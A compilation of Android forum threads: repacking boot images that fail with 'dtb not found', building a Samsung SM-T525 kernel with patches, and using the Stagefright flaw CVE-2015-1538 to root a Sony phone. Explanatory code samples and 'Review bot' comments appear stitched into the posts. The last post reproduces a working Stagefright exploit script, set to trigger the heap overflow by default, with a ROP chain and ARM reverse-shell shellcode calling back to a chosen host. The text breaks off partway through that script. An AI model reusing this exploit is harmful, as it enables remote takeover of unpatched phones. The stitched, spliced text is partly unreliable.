Fastboot boot image : dtb not found - Android Q&A, Help & Troubleshooting

Hi there
I am having a problem re-packing my boot image to boot on my new Pantech A880S....
It works fine if I just fastboot boot <original image>,
but once I extract the zImage and ramdisk and then re-pack it (even though I didn't change anything)
and then retry fastboot boot <re-packed image>, it comes up with the error: dtb not found
I hit this same issue whether I re-pack the image with abootimg on Linux or with the Win32 port exe,
e.g. http://forum.xda-developers.com/showpost.php?p=45157543&postcount=144
Does anyone know why? I have never seen this error before on other devices..
Does anyone know about the kernel and dtb, and how to extract them and pack them correctly?
Splitting image to "/split_img/" . . .
BOARD_KERNEL_CMDLINE console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 maxcpus=2 msm_rtb.filter=0x3F ehci-hcd.park=3 loglevel=0
BOARD_KERNEL_BASE 00000000
BOARD_PAGE_SIZE 2048
BOARD_RAMDISK_ADDR 02000000
Unpacking ramdisk to "/ramdisk/" . . .
Compression used: gzip
4704 blocks
Done!
Everything looks ok, but when I use fastboot to boot it (my device has an unlocked bootloader):
>fastboot boot image-new.img
downloading 'boot.img'...
OKAY [ 0.301s]
booting...
FAILED (remote: dtb not found)
finished. total time: 0.316s
Edit:
I tried looking at other similar kernel sources from the LG G2 (MSM8974)
/arch/arm/mach-msm/Makefile.boot
It seems LG is also using DTB in its kernel... so I am wondering whether the current abootimg can handle it or not?
# MSM8974
zreladdr-$(CONFIG_ARCH_MSM8974) := 0x00008000
ifeq ($(CONFIG_MACH_LGE),n)
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-cdp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-fluid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-liquid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-mtp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-rumi.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-sim.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-cdp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-fluid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-liquid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-mtp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += apq8074-v2-liquid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += apq8074-v2-dragonboard.dtb
else
dtb-$(CONFIG_ARCH_MSM8974_G2_KR) += msm8974-g2-kr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_KR) += msm8974-v2-g2-kr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_ATT) += msm8974-g2-att.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_ATT) += msm8974-v2-g2-att.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_VZW) += msm8974-g2-vzw.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_VZW) += msm8974-v2-g2-vzw.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_SPR) += msm8974-g2-spr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_SPR) += msm8974-v2-g2-spr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_TMO_US)+= msm8974-g2-tmo_us.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_TMO_US)+= msm8974-v2-g2-tmo_us.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_DCM) += msm8974-g2-dcm.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_DCM) += msm8974-v2-g2-dcm.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_KDDI) += msm8974-g2-kddi.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_KDDI) += msm8974-v2-g2-kddi.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_COM) += msm8974-g2-open_com.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_COM) += msm8974-v2-g2-open_com.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_AME) += msm8974-g2-open_ame.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_AME) += msm8974-v2-g2-open_ame.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPT_AU) += msm8974-g2-opt_au.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPT_AU) += msm8974-v2-g2-opt_au.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_CA) += msm8974-g2-ca.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_CA) += msm8974-v2-g2-ca.dtb
endif
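An added example (not code from this thread, abootimg or the split tool) that builds and parses a boot image in the layout bootimg.h describes, with the device-tree section that dtbTool produces placed after the kernel, ramdisk and second-stage pages. A repacker that ignores that section writes an image whose dt_size field is 0, which is the condition Qualcomm's LK bootloader reports as "dtb not found" when the zImage has no appended DTB either; the sample kernel, ramdisk and "QCDT" blob are constructed stand-ins.

```python
import struct

BOOT_MAGIC = b"ANDROID!"
# Header v0 as laid out in bootimg.h: magic, ten u32 fields, 16-byte product name,
# 512-byte cmdline, eight u32 id words. The ninth u32 is dt_size in the Qualcomm
# variant (the AOSP header of the time called it "unused").
HDR_FMT = "<8s10I16s512s8I"
HDR_SIZE = struct.calcsize(HDR_FMT)          # 608 bytes
FIELDS = ("kernel_size", "kernel_addr", "ramdisk_size", "ramdisk_addr",
          "second_size", "second_addr", "tags_addr", "page_size", "dt_size", "unused")

def _pad(blob, page_size):
    """Pad a section to a whole number of pages, as mkbootimg does."""
    rem = len(blob) % page_size
    return blob + b"\x00" * (page_size - rem) if rem else blob

def build_boot_img(kernel, ramdisk, dt=b"", page_size=2048, base=0x00000000,
                   ramdisk_offset=0x02000000, tags_offset=0x01E00000,
                   cmdline=b"console=null androidboot.hardware=qcom"):
    """Assemble header | kernel | ramdisk | dt, each page aligned. dt=b"" produces
    the kind of image a dt-unaware repacker writes (dt_size == 0)."""
    hdr = struct.pack(HDR_FMT, BOOT_MAGIC,
                      len(kernel), base + 0x00008000,      # mkbootimg's default kernel offset
                      len(ramdisk), base + ramdisk_offset,
                      0, base + 0x00F00000,                # no second-stage image
                      base + tags_offset, page_size,
                      len(dt), 0,
                      b"", cmdline, *([0] * 8))
    img = _pad(hdr, page_size) + _pad(kernel, page_size) + _pad(ramdisk, page_size)
    if dt:
        img += _pad(dt, page_size)
    return img

def parse_boot_img(img):
    """Decode the header and compute where each section starts."""
    f = struct.unpack_from(HDR_FMT, img, 0)
    if f[0] != BOOT_MAGIC:
        raise ValueError("not an Android boot image")
    h = dict(zip(FIELDS, f[1:11]))
    h["cmdline"] = f[12].rstrip(b"\x00").decode("ascii", "replace")
    ps = h["page_size"]
    pages = lambda n: (n + ps - 1) // ps
    off = ps                                   # the header occupies one page
    for sec in ("kernel", "ramdisk", "second"):
        h[sec + "_offset"] = off
        off += pages(h[sec + "_size"]) * ps
    h["has_dt"] = h["dt_size"] > 0             # False: nothing for the bootloader to find
    h["dt_offset"] = off if h["has_dt"] else None
    return h

def extract_dt(img):
    """Return the device-tree blob, or None when the image carries none."""
    h = parse_boot_img(img)
    if not h["has_dt"]:
        return None
    return img[h["dt_offset"]:h["dt_offset"] + h["dt_size"]]

# Constructed stand-ins for a zImage, a gzip ramdisk and a dtbTool "QCDT" blob.
KERNEL = b"\x00" * 100
RAMDISK = b"\x1f\x8b" + b"\x00" * 50
DT_BLOB = b"QCDT" + b"\x01" * 60

if __name__ == "__main__":
    for label, img in (("with dt", build_boot_img(KERNEL, RAMDISK, DT_BLOB)),
                       ("repacked without dt", build_boot_img(KERNEL, RAMDISK))):
        h = parse_boot_img(img)
        print("%s: dt_size=%d has_dt=%s" % (label, h["dt_size"], h["has_dt"]))
```

Run parse_boot_img over the original and the re-packed image and compare dt_size: a tool that drops the section shows 0 in the second one.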

I modified the split tool to support dtb, please test it……
Modify permissions before you use it
chmod a+x split_bootimg_dtb.pl
View attachment split_bootimg_dtb.zip

Thanks benjaminwan

https://github.com/xiaolu/mkbootimg_tools

benjaminwan said:
I modified the split tool to support dtb, please test it……
Modify permissions before you use it
chmod a+x split_bootimg_dtb.pl
View attachment 2229037
I'm testing, hoping to succeed @benjaminwan :fingers-crossed:

benjaminwan said:
I modified the split tool to support dtb, please test it……
Modify permissions before you use it
chmod a+x split_bootimg_dtb.pl
View attachment 2229037
Great work! I'm going to see if I can adapt this back into unpackbootimg. :good:
https://github.com/CyanogenMod/android_system_core/tree/cm-10.2/mkbootimg
Edit: Easier than I thought just using what was already in unpackbootimg.c and bootimg.h
Soon to be added to my Android Image Kitchen: http://v.ht/AIK-

reachedxyz said:
thanks you pro
Help me. My phone is bricked.

Chenglu said:
https://github.com/xiaolu/mkbootimg_tools
Thanks, that works for me :angel:

Hello Guys,
I'm trying to boot the HTC Desire 510 CWM recovery on my new Wiko Ridge 4G.
I also got the DTB issue, but I'm not sure on how to fix it.
Can anyone throw me some tips on this?
I've chosen the Desire CWM because it has the same chipset.
Cheers

help me
Please give me a tutorial on how to modify the split tool.

Hi Benjamin,
I am using a Lenovo A6000 Plus and getting the same error when I try to fastboot using the command <fastboot boot "c:\Users\rakesh\lenovo-recovery-file\recovery.img">
What should I do?
I am not even able to enter recovery mode. My mobile switched off during the Android upgrade. I think I lost some system files.

My Lenovo A6000 Plus gives the error "remote: dtb not found". How do I fix the problem?

Booting problem
Please explain step by step. I need help, it does not boot into any recovery.

Hi, I am also having the same problem with my Lenovo A6000. When I try to boot into recovery I get this error: failed {remote: dtb not found}. Please help me, anyone.

How do I apply the zip file to fix "dtb not found" during the fastboot boot recovery.img command @benjaminwan

Related

Building kernel SM-T525

Instructions to build a kernel from Samsung sources:
1. Download and unpack the source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525
2. Download and unpack the Android NDK from https://developer.android.com/tools/sdk/ndk/index.html
3. Set environment variables (use gcc 4.6, not 4.8):
export CROSS_COMPILE="~/android/android-ndk-r9d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"
export ARCH="arm"
4. If you want to add loadable module support, apply the patch modules_support.patch from the attachment
patch -p1 < modules_support.patch
5. Create the kernel config
make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig
6. Build the kernel
make -j3
7. Build the device tree image
./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/
8. Build boot.img (default ramdisk image in the attachment)
./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img
9. Create a .tar.md5 to flash with Odin
tar -H ustar -c boot.img > boot.tar
md5sum -t boot.tar >> boot.tar
mv boot.tar boot.tar.md5
10. To fix Wi-Fi, edit build.prop on your device and change ro.securestorage.support from true to false
ro.securestorage.support=false
GitHub: https://github.com/vanyasvl/android_kernel_samsung_picassoeur
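An added example (not from this post or the linked repository) that builds the step 9 artifact in memory, a ustar archive with the `md5sum -t boot.tar` line appended, and verifies the trailer before flashing, which is the check Odin performs and the one to run on a downloaded .tar.md5 that fails to flash. The boot.img content is a constructed stand-in.

```python
import hashlib
import io
import tarfile

def make_tar_md5(member_name, payload, archive_name="boot.tar"):
    """Build the same artifact as step 9 in memory: a ustar archive with the
    output of `md5sum -t boot.tar` ("<hex>  boot.tar\\n") appended to it."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        info = tarfile.TarInfo(member_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    tar_bytes = buf.getvalue()
    digest = hashlib.md5(tar_bytes).hexdigest()
    return tar_bytes + ("%s  %s\n" % (digest, archive_name)).encode("ascii")

def split_tar_md5(data):
    """Separate archive bytes from the trailer. A tar archive always ends in
    NUL-filled end-of-archive blocks, so the md5 line is whatever follows the
    last NUL byte."""
    cut = data.rfind(b"\x00") + 1
    return data[:cut], data[cut:]

def verify_tar_md5(data):
    """Return (ok, expected_hex, actual_hex); ok is False for a bad or missing trailer."""
    body, trailer = split_tar_md5(data)
    actual = hashlib.md5(body).hexdigest()
    fields = trailer.decode("ascii", "replace").split()
    if len(fields) != 2 or len(fields[0]) != 32:
        return False, "", actual
    expected = fields[0].lower()
    return expected == actual, expected, actual

def archive_members(data):
    """List the members of the archive part, proving the split left a valid tar."""
    body, _ = split_tar_md5(data)
    with tarfile.open(fileobj=io.BytesIO(body), mode="r:") as tar:
        return tar.getnames()

# Constructed stand-in for boot.img: the Android boot magic followed by padding.
FAKE_BOOT_IMG = b"ANDROID!" + b"\x00" * 100

if __name__ == "__main__":
    pkg = make_tar_md5("boot.img", FAKE_BOOT_IMG)
    print(verify_tar_md5(pkg), archive_members(pkg))
```

For a real package, pass `open("boot.tar.md5", "rb").read()` to verify_tar_md5.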
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
Hello. I'm trying to build the stock Samsung kernel for the Tab Pro 10.1 SM-T525 and I have a problem:
Wi-Fi isn't working on the built kernel. All kernel configs are default from Samsung; Bluetooth and LTE work ok.

I need help debugging the Wi-Fi problem.
The "ip a" command shows the wlan0 network device, but Wi-Fi can't be enabled from the configuration.

My steps to build the kernel:
Download the source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525
unpack it to ~/android/kernel

cd ~/android/kernel
export CROSS_COMPILE="/home/vanyas/android/android-ndk-r9d_x64/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"
export ARCH="arm"

make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig
make -j3

./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/

unpack the original boot.img with split_boot to the boot folder

./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk boot/boot.img-ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img

tar -H ustar -c boot.img > boot.tar
md5sum -t boot.tar >> boot.tar
mv boot.tar boot.tar.md5
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
crpalmer said:
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
Thanks, but it is not a module load problem. The SM-T525 kernel builds without module support and the wifi driver (bcm4339) is compiled into the kernel.
vanyas said:
Thanks, but it is not a module load problem. The SM-T525 kernel builds without module support and the wifi driver (bcm4339) is compiled into the kernel.
That's interesting. The sm-t320 is a prima chipset which is built as a module.
Do you see anything in the logcat or the dmesg related to the wlan, bcm4339, wifi, etc?
There are patches for the SM-T525 kernel source that resolve the problem with "modules support" compilation
--- kernel_orig/arch/arm/mm/proc-syms.c 2014-04-09 12:10:04.846114000 +1100
+++ kernel/arch/arm/mm/proc-syms.c 2014-04-09 11:54:33.894114000 +1100
@@ -18,7 +18,6 @@
#ifndef MULTI_CPU
EXPORT_SYMBOL(cpu_dcache_clean_area);
EXPORT_SYMBOL(cpu_set_pte_ext);
-EXPORT_SYMBOL(cpu_tima_set_pte_ext);
#else
EXPORT_SYMBOL(processor);
#endif
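Review bot: the removed line `-EXPORT_SYMBOL(cpu_tima_set_pte_ext);` drops the export unconditionally, so any module that references cpu_tima_set_pte_ext will fail to load with an unresolved symbol once CONFIG_MODULES is enabled; the patch carries no description, so state which build error this fixes (presumably the symbol is not defined in the non-MULTI_CPU proc code of this tree) and, if the symbol does exist in some configurations, guard the export with the same ifdef as its definition rather than deleting it.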
--- kernel_orig/arch/arm/mach-msm/sec-switch.c 2014-01-23 15:34:20.000000000 +1100
+++ kernel/arch/arm/mach-msm/sec-switch.c 2014-04-09 11:29:26.322114000 +1100
@@ -2565,7 +2565,7 @@
pr_info("%s: Ignore Cable setting, Not LPM mode\n", __func__);
}
}
-EXPORT_SYMBOL(fsa9485_set_mhl_cable)
+EXPORT_SYMBOL(fsa9485_set_mhl_cable);
boon fsa9485_muic_is_mhl_attached(void)
{
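Review bot: the added `;` after `EXPORT_SYMBOL(fsa9485_set_mhl_cable)` is the whole fix and is correct, since the macro expands to declarations that need the terminator. The following context line reads `boon fsa9485_muic_is_mhl_attached(void)` where the source almost certainly has `bool`, so this copy of the patch looks retyped; run `patch -p1 --dry-run` first to confirm the context still matches the Samsung tree before relying on it.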
--- kernel_orig/Makefile 2014-01-23 15:34:19.000000000 +1100
+++ kernel/Makefile 2014-04-09 20:55:48.278114000 +1100
@@ -351,7 +351,7 @@
CHECKFLAGS := -D__linux__ -Dlinux -D__STDC__ -Dunix -D__unix__ \
-Wbitwise -Wno-return-void $(CF)
-CFLAGS_MODULE =
+CFLAGS_MODULE = -fno-pic
AFLAGS_MODULE =
LDFLAGS_MODULE =
CFLAGS_KERNEL =
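Review bot: replacing `CFLAGS_MODULE =` with `CFLAGS_MODULE = -fno-pic` in the top-level Makefile makes every module non-PIC, presumably because the NDK toolchain from step 3 emits position-independent code by default and the ARM module loader rejects the resulting GOT relocations; say so in the description, and consider adding the flag in arch/arm/Makefile instead so the generic top-level Makefile stays unmodified and the change survives a rebase.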
Yes! I did it!
To fix wifi: ro.securestorage.support=false in build.prop
thornev said:
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
scrosler said:
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
Can you make a thread showing us some of the difficulties you encountered working around Knox?
Silkmeister
@Silkmeister1, @Scott, @vanyas, @crpalmer:
I have a WiFi/BT issue with my (second hand) device. WiFi/BT cannot be enabled in Android. My first suspect was a broken connection, but I couldn't find anything obvious.
I tried to update the stock ROM and found an issue with ODIN. The stock ROM was not installable; it returns a size error in the hidden image (??? what is in there ???). I installed the latest LOS and checked the boot messages.
Do you think this could be a software issue? Is there anything missing (stuff in the hidden partition)?
Code:
failed to power up wifi chip, retry again (4 left) **
[ 4.035535] ## wifi_remove
[ 4.035538] wifi_set_power = 0
[ 4.035541] ------------------------------------------------
[ 4.035542] ------------------------------------------------
[ 4.035544] brcm_wlan_power Enter: power off
[ 4.035548] WL_REG_ON off-step : [1]
[ 4.035554] WL_REG_ON off-step-2 : [0]
[ 4.139482] wifi_set_carddetect = 0
[ 4.139485] brcm_wifi_status:359 status 0
[ 4.139487] mmc0: Slot status change detected (1 -> 0)
[ 4.139870] wifi_set_power = 1
[ 4.139873] ------------------------------------------------
[ 4.139874] ------------------------------------------------
[ 4.139876] brcm_wlan_power Enter: power on
[ 4.139880] WL_REG_ON on-step : [0]
[ 4.139887] WL_REG_ON on-step-2 : [1]
[ 4.349477] wifi_set_carddetect = 1
[ 4.349480] brcm_wifi_status:359 status 1
…
Complete bootlog can be seen here in the attachment:
https://forum.xda-developers.com/showpost.php?p=72624259&postcount=213
Any help is welcome!

Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?

Hello to the community!
I've seen a video on the Zimperium Stagefright Detector App page in the Google Play Store showing how you can get root access to an Android system. And that seems to be quite easy - just executing a Python script.
So my questions are:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven't tested yet on my Sony Xperia Z5 compact device)
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the necessary files in the system, maybe manually via telnet?
- Can this be done without unlocking the bootloader?
- Which files have to be changed and what are the changes to get permanent root access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Regards from Dresden
"Klaus"
klausstoertebeker said:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven't tested yet on my Sony Xperia Z5 compact device)
Yes, according to Stagefright Detector. I could not get Stagefright to work on my Z5C, but that is probably due to my shortcomings.
klausstoertebeker said:
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the necessary files in the system, maybe manually via telnet?
Probably not. Stagefright will give you "media" or "system" privileges. These users can't remount the system partition to make it writable. Also, Sony has strengthened the security using a kernel module (Sony RIC) that disallows any user (even root) from remounting the system partition.
However, you could maybe (very unlikely) find a system-writable executable file in the ramdisk and hope for root to execute your modified file.
klausstoertebeker said:
- Can this be done without unlocking the bootloader?
Afaik, no one has succeeded yet.
klausstoertebeker said:
- Which files have to be changed and what are the changes to get permanent root access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Permanent root on this device is rather tough to achieve. You can't modify system partition due to dm-verity (verified boot), and you can most likely not modify boot partition without unlocking the bootloader.
As you say, your best shot is to achieve temporary root by exploiting some kernel module/driver and then dump TA. This is of course not trivial.
There is maybe another way to get both root and DRM features. As system user (achieved using Stagefright), you can query the "tad" socket to retrieve the DRM keys. This is how Sony is reading the DRM keys when verifying things. When you have the DRM keys you can unlock BL, root, and then modify your ROM to spoof "tad" socket responses with your previously extracted keys. Unlikely, but possibly, you could even write the keys back to the TA partition.
This method requires system privileges. If some clever one helps me getting Stagefright working, I could probably extract the DRM keys.
Maybe the CVE-2015-3636 is easier to use?
Hi nilezon!
Due to the fact I'm on vacation I can't try to get the CVE-2015-1538 exploit working - my SONY Xperia Z5 compact is at home
But I surfed the Internet and found another exploit that's maybe easier to be used to get root privileges: CVE-2015-3636
And if I get the document right, a non-privileged app could be used to get root privileges using a pointer use-after-free bug in the kernel. I'm not an app programmer (I just programmed aviation software parts for jet-propelled military planes), but it seems to me that the way described in the linked document is easier to go than the way to use CVE-2015-1538 - I read on the internet that Sony is currently delivering a patch closing the Stagefright exploit.
To find out if my phone (SONY Xperia Z1 compact) and tablet are vulnerable to the CVE-2015-3636, I used the app VTS for Android.
If this is a viable way and you could write an app, maybe the code for backing up the DRM keys or the whole TA partition could be included in that app, using the CVE-2015-3636 exploit to get even temporary root privileges...
What do you think?
Regards
"Klaus"
klausstoertebeker said:
...
AFAIK, the Z5 family is not vulnerable to the CVE-2015-3636 exploit.
Generating the CVE-2015-1538 mp4 file
Hi nilezon,
I was able to generate the CVE-2015-1538 file by making three modifications to the Python code published by Joshua J. Drake:
Code:
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise 'Yo! They call it "FourCC" for a reason.'
ret = struct.pack('>L', len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mNumChunkOffsets
return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mDefaultSampleSize
ret += struct.pack('>L', 0) # mNumSampleSizes
return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mTimeToSampleCount
return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret = ''
ret += struct.pack('>L', start + 1)
ret += struct.pack('>L', per)
ret += struct.pack('>L', desc)
return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
# def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True):
ret = struct.pack('>L', 0) # version/flags
# this is the clean version...
if not do_overflow:
ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
ret += 'Z' * (12 * num_alloc)
return make_chunk('stsc', ret)
# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk('stsc', ret)
# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop = ''
rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000) # new r1 - length
rop += struct.pack('<L', 7) # new r2 - protection
rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start) # address of native payload
#rop += struct.pack('<L', 0xfeedfed5) # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf = ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
